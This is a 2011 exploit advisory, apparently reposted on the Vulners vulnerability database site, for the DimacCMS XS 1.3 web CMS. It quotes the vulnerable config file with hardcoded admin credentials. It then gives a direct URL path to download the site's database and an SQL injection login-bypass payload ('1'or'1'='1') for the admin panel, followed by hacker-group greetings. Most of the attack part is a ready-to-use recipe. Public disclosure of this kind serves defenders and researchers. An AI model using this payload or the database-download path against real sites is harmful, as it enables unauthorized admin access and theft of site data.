Lucene search
K

DimacCMS XS 1.3 SQL Injection / Database Disclosure

🗓️ 10 Apr 2011 00:00:00Reported by KedAns-DzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

DimacCMS XS 1.3 SQL Injection / Database Disclosure vulnerability in GlobalData.asp allows for database download and admin config info leak

Code
`###  
# Title : DimacCMS xs <=1.3 Multiple Vulnerability  
# Author : KedAns-Dz  
# E-mail : [email protected] | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Twitter page : twitter.com/kedans  
# platform : asp  
# Impact : Database Download / Bypass  
# Tested on : Windows XP sp3 FR  
###  
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )  
##  
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com)  
###  
  
[+] http://[localhost]/[path]/GlobalResources/scripts/GlobalData.asp << Admin Config Info  
  
# Vulnerability in File 'GlobalData.asp' :  
  
<!--#include file = "Lang_File.asp"-->  
<%  
'----------------------------------------------------------------------------------------  
' Site Constants  
'----------------------------------------------------------------------------------------  
SiteUseFrames = TRUE ' // Valid are [ FALSE | TRUE ]  
AdminUserName = "admin" ' // << Username Here  
AdminPassword = "admin" ' // << Password Here  
'----------------------------------------------------------------------------------------  
' Function GetConnStr  
'----------------------------------------------------------------------------------------  
Function GetConStr(dbPath)  
p = dbPath & "Database\[Database-name].mdb"  
GetConStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(p)   
End Function  
%>  
  
  
# Exploit :   
  
[1] http://[localhost]/[path]/SiteResources/Data/Database/database.mdb << Download DB  
  
[2] http://[localhost]/[path]/CMSadmin/default.asp >>  
  
Username : admin  
Password : 1'or'1'='1 | Password : admin << or See Admin Config  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >  
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz  
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org)   
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * KelvinX (kelvinx.net)   
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{  
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX   
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,  
# www.1337day.com * exploit-db.com * exploit-id.com * www.packetstormsecurity.org * bugsearch.net  
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...  
#================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation